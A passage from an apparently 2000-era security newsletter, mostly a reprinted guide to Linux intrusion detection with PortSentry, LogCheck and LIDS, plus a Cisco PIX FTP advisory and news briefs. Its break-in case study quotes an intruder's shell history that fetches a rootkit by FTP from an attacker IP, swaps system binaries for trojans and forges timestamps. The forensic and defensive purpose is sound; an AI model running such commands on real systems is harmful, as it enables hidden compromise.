run most Web sites, says Eugene Spafford, director of the Center for
Education and Research in Inormation Assurance and Security lab at
Purdue University.
Link: USA Today
http://www.usatoday.com/life/cyber/tech/cth950.htm
@HWA
203.0 [HNS] May 24:INTRUSION DETECTION ON LINUX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 24 May 2000 on 12:54 AM
"This article focuses on several host-based intrusion detection
systems that are available on Linux. In particular, I will cover some
of the basics of installing setting up these packages, how they are
useful, and in what circumstances they can be used. This article
assumes a basic knowledge of systems security. In particular, I will
assume that the most basic security measures have already been taken
to secure a host against intrusion from the internet."
Link: Security Focus
http://www.securityfocus.com/focus/linux/articles/linux-ids.html
Typical newbie fare, graphic missing from this text version, use link
to ogle the chart. - Ed
Focus On Linux: Intrusion Detection on Linux by David "Del" Elson last
updated Monday, May 22, 2000
Articles and General Resources in this Section
Subscribe to the FOCUS-Linux Mail List
by Security Focus Inc.
Installing Linux
by Peter Merrick
Securing Linux
by Dale Coddington
Securing Linux Pt II.
by Dale Coddington
Linux and IPSec
by Rafael Coninck Teigao
Linux Security Tools
by Jonathan Day
Building a Linux Bunker: Basic Firewalling
by Rafael Coninck Teigao
Intrusion Detection on Linux
by David "Del" Elson
Bastille Linux Walkthrough
by Jay Beale
-------------------------------------------------------------------------
------- Relevant Links
The Abacus Project
Psionic Software
Linux Intrusion Detection/Defense System
lids.org
The Linux Openwall Project
Openwall
RedHat
RedHat
RedHat kernel upgrade docs
RedHat
RedHat LIDS Kernel Patch
lids.org
Introduction
This article focuses on several host-based intrusion
detection systems that are available on Linux. In particular, I will
cover some of the basics of installing setting up these packages, how
they are useful, and in what circumstances they can be used.
Systems Security 101
This article assumes a basic knowledge of
systems security. In particular, I will assume that the most basic
security measures have already been taken to secure a host against
intrusion from the internet. These measures could include:
Firewalling, to ensure that access to the various TCP and UDP ports of
the system that were not intended for internet access are prevented. For
example, a basic set of firewalling rules for a web server would ensure
that the only TCP/IP access to the machine was on TCP port 80, the port
normally used for HTTP access.
Disabling daemons that are not required. For example: A web server
normally needs a process running to serve web pages. Processes that are
not associated with serving web pages, such as RPC/Portmap services, NFS
services, X Font Server, DNS name server, and other extraneous and unused
applications should be stopped or disabled. On a Red Hat Linux system,
this is normally done by using one of the run level editors, for example
ntsysv or tksysv, to disable the startup of any daemon or service that is
not required.
Disabling access to ports that are not required, by editing
/etc/inetd.conf. Typically, a system will come pre-installed with access
to many ports enabled in the /etc/inetd.conf file. Editing this file to
remove or comment out any lines that are not required is the most basic
system security activity and should be carried out on all systems.
Lines of Defence
Illustration 1: Multi Layered Systems Security
In this article, I will discuss a multi-layered approach to systems
security. Several security layers can be used independently to provide
additional protection in case any of the layers should be breached. An
example of a multi-layered security system is shown in illustration 1.
Each layer in the diagram provides additional data protection to the
layers above it. For example, the first layer is the firewall. Should an
intrusion attempt not be defeated by the firewall, a second layer, the
Port Sentry program, can provide additional protection.
Further inside the security system are the LIDS and LogCheck programs,
that provide additional protection should an intrusion attempt not be
intercepted by the Port Sentry program.
Monitoring Incoming Connections
The first layer of protection behind
the firewall is a software package that will monitor incoming attempts to
connect to the machine. The PortSentry package
(http://www.psionic.com/abacus/portsentry/) provides a simple and
effective method of doing this.
What does PortSentry do?
PortSentry is a program that monitors
activity on specific TCP/IP ports. Activity on the ports that are
monitored by PortSentry is reported, and one of several options can be
taken, including denying further attempts to access to your system from
the source of the activity. This is an important defence mechanism,
because a hacker will typically probe your system for weaknesses ("port
scanning") before attempting an intrusion. Detecting the probe or port
scan, and completely denying further access to your system by a potential
hacker, robs that hacker of the ability to follow up on any port scans
with a real intrusion attempt.
Installing PortSentry
For users of Red Hat Linux, PortSentry is
available in RPM format on the Red Hat contrib FTP site. This site is
mirrored in various locations around the world, check at www.redhat.com
for the location of your nearest mirror. I haven't yet determined the
availability of a .deb format package for PortSentry but I am sure there
is one out there.
For other Linux systems, installing PortSentry from the source code is
relatively simple.
Recommended Configuration
PortSentry runs in a number of modes,
including various TCP and UDP stealth modes. The mechanism that I prefer
to use for running PortSentry is to bind it to a TCP port that (a) is not
in use, and (b) is known in some systems to have potential for intrusion
attempts. For example, port 143 (imap2), port 111 (portmap) and port 23
(telnet) are TCP ports that I do not use on my internet systems, and my
web server was scanned on both of those ports in the last 24 hours.
To start PortSentry in basic TCP mode, ensure that your system start-up
scripts run this command somewhere:
portsentry -tcp
Also, ensure that the PortSentry config file (portsentry.conf) contains a
TCP_PORTS line enabling scanning on the ports that you require.
Response Options
The "Response Options" section of the
portsentry.conf file allows you to specify what response that PortSentry
will take on detecting unwanted activity. The mechanism that I normally
choose is to use ipchains to block further access from the source of the
activity. This is done by uncommenting the following line in the
portsentry.conf file:
KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"
On systems that receive a high level of port scanning activity, removing
the "-l" at the end of the above line will prevent logging of further
incoming connections, which might be useful to save space in the log
files.
Monitoring System Logs
Firewalling systems, and software like
PortSentry perform one useful function, in that they monitor and prevent
connections coming in to unwanted ports on the system. This can prevent
access to a system via a standard scan-and-intrude method.
Where a system is required to run a particular service (eg: Apache on a
web server, or BIND on a DNS server), and a hacker has uncovered a
particular loophole in the service, these programs will unfortunately not
achieve the result of keeping all intruders out of the system. A system
acting as a DNS server that has a vulnerable copy of BIND running on it
will eventually be discovered by a hacker that scans a wide range of
machines for a single port (the DNS port) on each machine, and attempts
intrusion against that port only. The firewall and PortSentry will
unfortunately see this intrusion attempt as a legitimate access to the
system.
LogCheck
LogCheck (http://www.psionic.com/abacus/logcheck/) is a
useful program for scanning system logs for unusual activity. LogCheck
works by scanning the various system log files (under Linux these are
located in /var/log), and notifying the system administrator by e-mail if
there is any unusual activity. Unusual messages in the log files can
often be generated by intrusion attempts, or actual intrusions against
your system.
Installing LogCheck
LogCheck is available in RPM format from the Red
Hat contrib archives, and from the same sources as PortSentry. Installing
LogCheck from the RPM file or from the source code (read the INSTALL file
provided with the source code) is relatively simple.
Configuring LogCheck
LogCheck has four main configuration files. In
the RPM version, these are stored in the /etc/logcheck directory.
Normally, only the logcheck.ignore and the logcheck.violations.ignore
files need modification. The normal process that I go through after
installing LogCheck is as follows:
Allow LogCheck to run once with the standard configuration files. This
willl produce a large output file, which can be thrown away.
24 hours later, allow LogCheck to run again. This will detect any new
entries in the log files since the last run, and will produce a smaller
but still sizeable output file. Read this file carefully.
For entries in the file that are of no great concern (use your judgement
for this) find a specific identifying string in the entry. For entries
that are in the "Security Violations" section, add the identifying string
to the logcheck.violations.ignore file. For other entries (in the
"Unusual System Events" section), add the string to the logcheck.ignore
file.
Repeat this process, once every 12 - 24 hours for approximately a week.
By this stage, enough "bogus" entries will be filtered out by the strings
that you have added to the .ignore files that the daily LogCheck report
will contain only genuine system concerns.
Note that the RPM file specifies that LogCheck is to be run hourly, but
normally I only run it daily except on critical systems that need regular
monitoring. This is done by moving the /etc/cron.hourly/logcheck file
into /etc/cron.daily.
Kernel Based Intrusion Detection
Kernel based intrusion detection is
a relatively new art form for Linux. The main kernel based intrusion
detection system currently available is called LIDS, and is available
from http://www.lids.org/.
What is LIDS?
LIDS is an intrusion detection and prevention system
that resides within the Linux kernel.
LIDS' protection is aimed at preventing the root user (who would normally
have access to the entire system) from tampering with important parts of
the system. LIDS' most important features include increased file system
protection, protection against direct port access or direct memory
access, protection against raw disk access, and protection of log files.
LIDS also prevents certain system actions, such as installing a packet
sniffer or changing firewall rules.
LIDS Documentation
The LIDS system is somewhat more complex to
install than either PortSentry or LogCheck. Fortunately, the LIDS web
site contains quite good documentation on the LIDS project, including
installation and configuration instructions.
Installing LIDS
First, before installing LIDS, make sure that you
have the most up to date LIDS patch (I am using 0.9), and the correct
kernel version. I am using the updated kernel (2.2.14-12) from the Red
Hat Updates FTP site, because this contains some security fixes. You also
need the source code for the kernel that you are using.
LIDS is currently targeted towards the 2.2.14 kernels. I installed LIDS
on a Red Hat 6.2 system, this includes the 2.2.14 kernel. Before I
installed LIDS, I obtained the updated kernel (from
ftp.redhat.com/updates/ or one of its mirrors) and installed it according
to the instructions at
http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.ht
ml.
The next thing I obtained was the updated kernel source, which also came
from ftp.redhat.com/updates/ This I installed using:
rpm -Uhv kernel-source-2.2.14-12.i386.rpm
Next, compile and install the lidsadm program:
cd /usr/local/src/security/lids-0.9/lidsadm-0.9
make make install
Generate a RipeMD-160 password that will later be installed into the
kernel:
lidsadm -P
I entered the password "anypass" and got back the key
"d502d92bfead11d1ef17887c9db07a78108859e8".
Next, I copied the standard Red Hat configuration file for my
architecture into the /usr/src/linux directory:
cd /usr/src/linux/configs/
cp kernel-2.2.12-i686.config ..
Next, I installed the LIDS patch using the following commands:
cd /usr/src
patch -p0
</usr/local/src/security/lids-0.9/lids-0.9-2.2.14-redhat.patch
Note that the Red Hat supplied kernel is slightly different from the
standard 2.2.14 kernel distributed by Linus, as it contains some updated
drivers. The lids-0.9-2.2.14-redhat.patch file that is available is
slightly different to the standard lids-0.9-2.2.14.patch file distributed
with LIDS, as the latter will not apply cleanly to Red Hat's kernel.
Finally, I configured, compiled, and installed the kernel:
cd /usr/src/linux
make menuconfig make dep; make clean make install;
make modules; make modules_install
The following script shows the LIDS configuration options that I chose
during the kernel configuration:
[*] Linux Intrusion Detection System support (EXPERIMENTAL)
--- LIDS
features [ ] Hang up console when raising a securit alert [*] Security
alert when execing unprotected programs before sealing [ ] Do not execute
unprotected programs before sealing LIDS [*] Enable init children lock
feature [*] Try not to flood logs (60) Authorised time between two identic
logs (seconds) [*] Allow switching LIDS protections RipeMD-160 encrypted
password: d502d92bfead11d1ef17887c9db07a78108859e8 (3) Number of attempts
to submit password (3) Time to wait after a fail (seconds) [*] Allow remote
users to switch LIDS protections [ ] Allow any program to switch LIDS
protections [*] Allow reloading config. file [ ] Hide some known processes
[*] Port Scanner Detector in kernel [ ] Send security alerts through
network --- Special authorizations [ ] Allow some known processes to access
/dev/mem (xfree, etc.) [ ] Allow some known processes to access raw disk
devices [ ] Allow some known processes to access io ports [ ] Allow some
known processes to change routes --- Special UPS [*] Allow some known
processes to unmount devices Allowed processes:
"/etc/rc.d/init.d/halt;/etc/rc.d/init.d/netfs" [*] Unmounting capability
is inherited [*] Allow some known processes to kill init children Allowed
processes: "/etc/rc.d/init.d/halt" [*] Killing capability is inherited
Note that since I don't have a UPS, am running a headless server (no X
installed), and need to access this system remotely, I chose the
configuration options above. The options that you choose for your
environment may vary.
Configuring LIDS
One important note: After compiling the kernel you
must configure LIDS before you next reboot!
LIDS stores its configuration in the /etc/lids.conf file. This file
should never be edited by hand, instead, you should configure LIDS by
using the lidsadm program.
Running "lidsadm -h" gives a page or so of help as to how to use the
lidsadm program. The LIDS documentation (on the LIDS web site) gives some
examples of using LIDS to protect files, for example:
lidsadm -A -r /sbin
... which protects (marks read-only) the entire /sbin directory.
My preferred LIDS configuration script looks like this:
lidsadm -Z
lidsadm -A -r /usr/bin lidsadm -A -r /bin lidsadm -A -r
/usr/sbin lidsadm -A -r /sbin lidsadm -A -r /usr/X11R6/bin lidsadm -A -r
/etc/rc.d lidsadm -A -r /etc/sysconfig
Once the LIDS system has been configured, you need to update your boot
scripts to ensure that the "lidsadm -I" command is run during the boot
process. This effectively "starts" the LIDS functions in the kernel. I
normally place lidsadm at the end of the /etc/rc.d/rc.local script, as
this ensures that the LIDS functionality doesn't prevent the rest of the
system scripts from operating correctly.
This is the command line that I use at the end of /etc/rc.d/rc.local to
start LIDS:
/sbin/lidsadm -I -- -CAP_SYS_MODULE -CAP_SYS_RAWIO -CAP_SYS_ADMIN \
-CAP_SYS_PTRACE -CAP_NET_ADMIN -CAP_LINUX_IMMUTABLE \ +INIT_CHILDREN_LOCK
Configuring LILO
Note that since the Kernel was updated using Red
Hat's RPMs, you will need to follow the instructions in the Red Hat
kernel upgrading web page mentioned above to modify the /etc/lilo.conf
file. This will ensure that the new kernel that has been compiled with
LIDS functionality will be the one booted when your system reboots.
After Reboot
After the next reboot, LIDS will be running on your
system. If you need to stop LIDS to perform system administration tasks,
then you should use one of the following commands:
/sbin/lidsadm -S -- -LIDS
or
/sbin/lidsadm -S -- -LIDS_GLOBAL
You will need to provide the LIDS password, which was inserted into the
kernel in RipeMD-160 format during the kernel compile.
You will also note that on shutdown, most of the shutdown scripts will
fail. This is normal. The final shutdown script (/etc/rc.d/init.d/halt)
will kill all of the processes and unmount the file systems. No other
process will be allowed to kill any of the children of the init()
process, due to the "+INIT_CHILDREN_LOCK" protection made in the rc.local
file (above).
Also, every 10 minutes, you will get an error message about "rmmod \as"
being unable to remove a module. This is because the "-CAP_SYS_MODULE"
protection stops insertion or removal of modules once LIDS has started.
To stop the error message happening, delete the /etc/cron.d/kmod file.
What Can LIDS Protect?
A quick read through the LIDS documentation
will reveal the full set of features in LIDS. The most important
features, in my opinion, include the following:
CAP_LINUX_IMMUTABLE, which protects the files and file systems from being
written to when marked "immutable".
CAP_NET_ADMIN, which prevents tampering with the network configuration
(eg: prevents route table entries from being changed, and prevents
firewall entries from being tampered with).
CAP_SYS_MODULE which prevents insertion and removal of kernel modules.
CAP_SYS_RAWIO which prevents raw disk/device I/O.
CAP_SYS_ADMIN which prevents a large range of other system administration
functions.
INIT_CHILDREN_LOCK which prevents child processes of the init() master
process from being tampered with.
All of the above features can be turned on at any point using "lidsadm
-I". The features can also be disabled at any point (to allow the real
system administrator access to the system configuration) by using
"lidsadm -S", and providing the LIDS password which was installed into
the kernel (and encrypted with RipeMD-160).
Anatomy of a Break In
I was recently asked to examine a system that
had been hacked, to determine the cause of the break-in, and to determine
what damage the hacker had done to the system. Fortunately, the system
was hacked by someone who was not particularly clever, and didn't manage
to conceal their tracks entirely.
The break-in occurred when the hacker overflowed the buffer of a system
daemon running as root (in fact one that should not have been running on
the system at all, but the person who installed Linux was careless and
left it running, and also failed to install Red Hat's released updates
which would have fixed the buffer overflow problem). The hacker, however,
was also careless in that when they managed to open a shell (BASH) on the
hacked system following the break-in, they forgot that the BASH shell
logs all activity to a .bash_history file for use by the command line
recall functions. A simple read through /.bash_history revealed exactly
what the hacker had done while logged on to the system.
The file read as follows (edited slightly for brevity):
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21 cd
/usr/lib/... mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz?
pstree.gz; mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz?
syslogd.gz; mv tcpd.gz? tcpd.gz gzip -d * chmod +x * mv netstat /bin ; mv ps
/bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/; mv
pstree /usr/bin ; /usr/lib/pt07 touch -t 199910122110 /usr/lib/pt07 touch -t
199910122110 /usr/sbin/syslogd touch -t 199910122110 /usr/sbin/tcpd touch
-t 199910122110 /bin/ps touch -t 199910122110 /bin/netstat touch -t
199910122110 /usr/bin/pstree cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf killall -HUP inetd
Reading through this file, we can note the following activity:
A directory with an unusual name (/usr/lib/...) was created on the
system. An FTP connection was made back to the hacker's personal machine
(200.192.58.201, traced to a dial-in address somewhere in Brazil), and a
simple hacker-kit was downloaded.
The hacker kit was uncompressed. It contained trojan binaries which were
then installed on the system.
The trojan binaries were used to over-write the system versions of
netstat, ps, tcpd, syslogd, and pstree. These are programs that get used
to report on system activity, show running processes, show open ports,
etc.
A backdoor process of some kind (/usr/lib/pt07) was installed and
started. Note that since the hacker has installed his or her own versions
of ps, pstree, and netstat, this trojan is probably invisible to the
system.
What Can We Learn From This?
Firstly, note that LIDS would not have
prevented the actual break-in. The hacker obtained root access to the
machine by connecting to and overflowing a buffer in a process that was
running as root.
Once the hacker had broken in, we can note how LIDS would have minimised
the damage:
LIDS, by using the CAP_LINUX_IMMUTABLE option, would have prevented the
trojan binaries from being written to /bin, /usr/bin, /usr/sbin, and
/usr/lib. These are directories that we would normally mark as immutable
(chattr +i) and hence could not have been changed. Note that even without
LIDS we can mark these directories as immutable using chattr +i, but LIDS
prevents even the root user from tampering with the immutable flag.
Similarly, the touch -t commands would have failed if the files were
marked chattr +i.
Even the very first line of the script, "mkdir /usr/lib/..." would have
failed if the /usr/lib directory was marked immutable!
Note that LIDS would not have prevented the break-in, but would have
prevented the hacker from causing any significant system damage after the
break-in. A backdoor process could have been installed (eg: the pt07
backdoor could have been placed in /tmp, or any other non-immutable
directory), but the non-trojan versions of ps, netstat, and pstree would
have detected this process fairly easily and we could have come back and
killed it off.
Without LIDS being installed we have no other real clues as to what the
hacker might have done via this backdoor, and so our only available
method to clean up the hacker's damage is to re-install the system
completely.
OpenWall and LIDS: An Extra Layer
Another similar system to LIDS is
the OpenWall project (http://www.openwall.com/linux/). The OpenWall
project contains some different security features to LIDS, and one of the
OpenWall patches in particular makes the stack area non-executable. An
excerpt from the OpenWall README file states:
Most buffer overflow exploits are based on overwriting a function's
return address on the stack to point to some arbitrary code, which is
also put onto the stack. If the stack area is non-executable, buffer
overflow vulnerabilities become harder to exploit.
Another way to exploit a buffer overflow is to point the return address
to a function in libc, usually system(). This patch also changes the
default address that shared libraries are mmap()'ed at to make it always
contain a zero byte. This makes it impossible to specify any more data
(parameters to the function, or more copies of the return address when
filling with a pattern), -- in many exploits that have to do with ASCIIZ
strings.
Recently, the LIDS web site has contained some integrated LIDS + OpenWall
kernel patches that apply the security features of both LIDS and OpenWall
to the kernel in a single integrated patch set.
Conclusions
Using a set of layered security tools on the Linux
system, it is possible to prevent a wide range of system attacks, and to
protect your system against intrusion or tampering. A hacker's point of
entry into your system will be the network interfaces, and protecting these,
and under the network interfaces, the system kernel, can discourage many
attacks and prevent others.
Be aware of any potential security holes in your system. Any daemon or service
running on your system, either as root or as a non-root user, can be a potential
security threat. Be prepared to face attacks against these threats.
@HWA
204.0 [HNS] May 24:CRACKED! PART 3: HUNTING THE HUNTER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 24 May 2000 on 12:51 AM
Noel continues the story of when some Unix boxes that he helped admin
were cracked. This article talks about some of the efforts made to
track down the cracker and some surprises.
Link: RootPrompt.org
http://rootprompt.org/article.php3?article
Url is b0rked
You have an error in your SQL syntax near ';' at line 1
Warning: 0 is not a MySQL result index in /usr/www/users/noeld/article.php3 on line 53
@HWA
205.0 [HNS] May 24: THE NEXT GENERATION OF ILOVEYOU:THE PORN WORM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 24 May 2000 on 12:45 AM
Erik Green writes "I've been sent a new semi-benign ILOVEYOU variant -
it's got a subject line of "Check this" and consists of a one-line
message and an attachment named LINKS.VBS. Its only purpose other than
self replication is to add a link to a XXX site to your desktop...
Link: Slashdot
http://slashdot.org/article.pl?sid
@HWA
206.0 [HNS] May 23:PAPERS SENT TO PROSECUTOROS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 23 May 2000 on 4:27 PM
Japan had a first case in which papers have been sent to prosecutors
on a minor suspected of "hacking" (article writes about hacking, but
it looks it was just password stealing) since a law banning illegal
computer access went into effect in February.
Link: Daily Yomiuri
http://www.yomiuri.co.jp/newse/0523cr11.htm
@HWA
207.0 [HNS] May 23:INFOEXPRESS AND NETWORK UTIL. AGREEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 23 May 2000 on 4:14 PM
InfoExpress, Inc., today announced an exclusive distribution agreement
with U.K.-based Network Utilities (Systems) Ltd., a leading
distributor of best-in-class enterprise security. The agreement names
Network Utilities the sole provider of InfoExpress' marketing and
technical support in the U.K. market.
Link: Press release
http://www.net-security.org/cgi-bin/press/fullnews.cgi?newsid959090959,5116,
@HWA
208.0 [HNS] May 23:FREE EXPORT OF ENCRYPTION SOFTWARE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 23 May 2000 on 3:13 AM
The European ministers of Foreign Affairs are expected to decide
monday to lift all barriers to the export of encryption software to
countries outside the European Union.
Link: Heise
http://www.heise.de/tp/english/inhalt/te/8179/1.html
@HWA
209.0 [HNS] May 23:NAI GAUNTLET FIREWALL VULNERABILITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 23 May 2000 on 3:05 AM
According to Security Focus a firewall package protecting thousands of
networks worldwide contains a bug that would allow attackers to obtain
"root" access remotely.
Link: Security Focus
http://www.securityfocus.com/news/40
@HWA
210.0 [HNS] May 22: CISCO SECURE PIX FIREWALL PROBLEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Monday 22 May 2000 on 10:07 PM
The Cisco Secure PIX Firewall interprets FTP (File Transfer Protocol)
commands out of context and inappropriately opens temporary access
through the firewall.
Link: Cisco
http://www.cisco.com/warp/public/707/pixftp-pub.shtml
Cisco Secure PIX Firewall FTP Vulnerabilities Revision 1.6 For public
release 2000 March 16 05:00 PM US/Pacific (UTC+0800)
Summary The Cisco Secure PIX Firewall interprets FTP (File Transfer
Protocol) commands out of context and inappropriately opens temporary
access through the firewall. This is an interim notice describing two
related vulnerabilities. The first vulnerability is exercised when the
firewall receives an error message from an internal FTP server containing
an encapsulated command such that the firewall interprets it as a distinct
command. This vulnerability can be exploited to open a separate
connection through the firewall. This vulnerability is documented as
Cisco Bug ID CSCdp86352.
The second vulnerability is exercised when a client inside the firewall
browses to an external server and selects a link that the firewall
interprets as two or more FTP commands. The client begins an FTP
connection as expected and at the same time unexpectedly executes another
command opening a separate connection through the firewall. This
vulnerability is documented as Cisco Bug ID CSCdr09226.
Either vulnerability can be exploited to transmit information through the
firewall without authorization.
Both vulnerabilities are addressed more completely in this updated interim
security advisory.
Who Is Affected All users of Cisco Secure PIX Firewalls with
software versions up to and including 4.2(5), 4.4(4), and 5.0(3) that
provide access to FTP services are at risk from both vulnerabilities.
Cisco Secure PIX Firewall with software version 5.1(1) is affected by the
second vulnerability only.
Cisco Secure Integrated Software (formerly Cisco IOS� Software Firewall
Feature Set) is not affected by either vulnerability.
Impact Any Cisco Secure PIX Firewall that has enabled the fixup
protocol ftp command is at risk of unauthorized transmission of data
through the firewall. Details The first vulnerability has been assigned
Cisco bug ID CSCdp86352. The second vulnerability has been assigned Cisco
bug ID CSCdr09226. The behavior is due to the command fixup protocol ftp
[portnum], which is enabled by default on the Cisco Secure PIX Firewall.
If you do not have protected FTP hosts with the accompanying configuration
(configuration example below) you are not vulnerable to the attack which
causes a server to send a valid command, encapsulated within an error
message, and causes the firewall to read the encapsulated partial command
as a valid command (CSCdp86352).
To exploit this vulnerability, attackers must be able to make connections
to an FTP server protected by the PIX Firewall. If your Cisco Secure PIX
Firewall has configuration lines similar to the following:
fixup protocol ftp 21 and either conduit permit tcp host 192.168.0.1 eq 21
any or conduit permit tcp 192.168.0.1 255.255.255.0 eq 21 any
It is possible to fool the PIX stateful inspection into opening up
arbitrary TCP ports, which could allow attackers to circumvent defined
security policies. If you permit internal clients to make arbitrary
FTP connections outbound, you may be vulnerable to the second
vulnerability (CSCdr09226). This is an attack based on CERT advisory
CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html and detailed in the
BUGTRAQ post: "Extending the FTP 'ALG' vulnerability to any FTP client"
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-0
8&msg=38C8C8EE.544524B1@enternet.se
The recommendation in the workarounds section of this document will
provide protection against this vulnerability.
Response for the first vulnerability (CSCdp86352) The following changes
have been made to the "fixup protocol FTP" behavior of the PIX Firewall:
Enforce that only the server can generate a reply indicating the PASV
command was accepted. Enforce that only the client can generate a PORT
command. Enforce that data channel is initiated from the expected side in
an FTP transaction. Verify that the "227" reply code and the PORT command
are complete commands and not part of a "500" error code string broken
into fragments. Enforce that the port is not 0 or in the range between
[1,1024] These or equivalent changes will be carried forward into all PIX
Firewall software versions after version 5.1(1).
Response for the second vulnerability (CSCdr09226) We have added an
additional command keyword to address this problem:
fixup protocol ftp [strict] <port1>[-<port2>] The "strict" keyword
directs the fixup protocol ftp command to maintain strict command state,
and may impact some FTP features such as command pipelining or command
grouping. This will be fixed in version 5.1(2) and subsequent versions, as
well as in version 4.4(5).
Software Versions and Fixes Getting Fixed Software Cisco is offering
free software upgrades to remedy this vulnerability for all affected
customers. Customers with service contracts may upgrade to any software
version. Customers without contracts may upgrade only within a single row
of the table below, except that any available fixed software will be
provided to any customer who can use it and for whom the standard fixed
software is not yet available. As always, customers may install only the
feature sets they have purchased. Version Affected Interim Release**(fix
will carry forward into all later versions) Available Now through the TAC
Projected first fixed regular release (fix will carry forward into all
later versions) All versions of Cisco Secure PIX up to version 4.2(5)
(including 2.7, 3.0, 3.1, 4.0, 4.1) 4.2(5)205** 4.2(6) Currently not
scheduled.* All 4.3.x and 4.4.x up to and including version 4.4(4)
4.4(4)202** 4.4(5) Estimated date available: 2000 May 30* All 5.0.x up to
and including version 5.0(1) 5.0(3)202** 5.0(4) Estimated date available:
On hold Version 5.1(1) - not affected by CSCdp86352 5.1(1)207** 5.1(2)
Estimated date available: 2000 June 9* * All dates are tentative and
subject to change ** Interim releases are subjected to less internal
testing and verification than are regular releases, may have serious bugs,
and should be installed with great care.
Schedules have been updated to include released versions that fix both
vulnerabilities addressed by this interim security advisory.
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained via the Software Center on Cisco's Worldwide Web site
at http://www.cisco.com/.
Customers without contracts should get their upgrades by contacting the
Cisco Technical Assistance Center (TAC). TAC contacts are as follows:
+1 800 553 2447 (toll-free from within North America) +1 408 526
7209 (toll call from anywhere in the world) e-mail: tac@cisco.com Give the
URL of this notice as evidence of your entitlement to a free upgrade. Free
upgrades for non-contract customers must be requested through the TAC.
Please do not contact either "psirt@cisco.com" or
"security-alert@cisco.com" for software upgrades.
Hardware requirements If version 4.3 or 4.4 is utilized on a PIX
'Classic' (excludes PIX10000, PIX-510, PIX-520, and PIX-515) or
If version 5.0 is utilized on a PIX 'Classic', PIX10000, or PIX-510
(excludes PIX-520 and PIX-515)
A 128MB upgrade for the PIX Firewall is necessary. As with any new
software installation, customers planning to upgrade should carefully read
the release notes and other relevant documentation before beginning any
upgrade. Also, it is important to be certain that the new version of Cisco
Secure PIX Firewall software is supported by your hardware, and especially
that enough memory is available.
Workarounds The behaviors described in this document are a result of
the default command fixup protocol ftp [portnum]. To disable this
functionality, enter the command no fixup protocol ftp. This will disable
support of the fixup of the FTP protocol in the PIX, and will eliminate
the vulnerabilities. The command fixup protocol ftp 21 is the default
setting of this feature, and is enabled by default on the Cisco Secure PIX
Firewall. This workaround will force your clients to use FTP in passive
mode, and inbound FTP service will not be supported. Outbound standard
FTP will not work without fixup protocol ftp 21, however, passive FTP will
function correctly with no fixup protocol ftp configured.
Exploitation and Public Announcements This vulnerability was proposed on
the BUGTRAQ list, and in follow-ups to the article, the Cisco Secure PIX
Firewall was also identified as susceptible. As the vulnerabilities have
been widely discussed, Cisco is posting this advisory prior to having a
full fix. We will update this notice again, when we have a full fix
available. Cisco has had no reports of malicious exploitation of this
vulnerability. However, versions of exploit scripts have been posted to
various security related lists.
This vulnerability was reported to Cisco via several sources, shortly
after the time of the original supposition.
Status of This Notice: INTERIM This is an interim field notice. Although
Cisco cannot guarantee the accuracy of all statements in this notice, all
the facts have been checked to the best of our ability. Cisco anticipates
issuing updated versions of this notice within four weeks (by June 26,
2000). Distribution This notice will be posted on Cisco's Worldwide Web
site at http://www.cisco.com/warp/public/707/pixftp-pub.shtml. In
addition to Worldwide Web posting, the initial version of this notice is
being sent to the following e-mail and Usenet news recipients:
cust-security-announce@cisco.com bugtraq@securityfocus.com
first-teams@first.org (includes CERT/CC) cisco@spot.colorado.edu
comp.dcom.sys.cisco firewalls@lists.gnac.com Various internal Cisco
mailing lists Future updates of this notice, if any, will be placed on
Cisco's Worldwide Web server, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the URL given above for any updates. Revision History
Revision 1.0 2000 March 16 08:00 AM US/Pacific (UTC+0800)- Initial public
release Revision 1.1 2000 March 16 08:00 AM US/Pacific (UTC+0800) - Link
corrections, table head clarification. Revision 1.3 2000 March 16 14:00 PM
US/Pacific (UTC+0800) - Addition of 2nd vulnerability issues. Revision 1.4
2000 April 4 12:00 PM US/Pacific (UTC+0800) - Changes to dates for fixed
software and Status of This Notice section. Revision 1.5 2000 April 28
5:30 PM US/Pacific (UTC+0800) - Changes to Summary, Response for the
second vulnerability (CSCdr09226), Software Versions and Fixes, and Status
of This Notice sections. Revision 1.6 2000 May 19 10:45 AM US/Pacific
(UTC+0800) - Changes to date in Status of This Notice INTERIM section, and
date change in the Software Version and Fixes section.
Cisco Security Procedures Complete information on reporting security
vulnerabilities in Cisco products, obtaining assistance with security
incidents, and registering to receive security information from Cisco, is
available on Cisco's Worldwide Web site at
http://www.cisco.com/warp/public/707/sec_incident_response.shtml. This
includes instructions for press inquiries regarding Cisco security
notices.
@HWA
211.0 [HNS] May 22:INDIA AND CYBER CRIME
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Monday 22 May 2000 on 7:11 PM
The Times of India published an article about cyber crime, where they
mention trojan horses as "cyber terrorism weapons". Other part of the
article speaks of what would they police do for fighting cyber crime.
"The police headquarters here has just two Internet connections. And
only 30 officers were introduced to a beginners' guide to computers
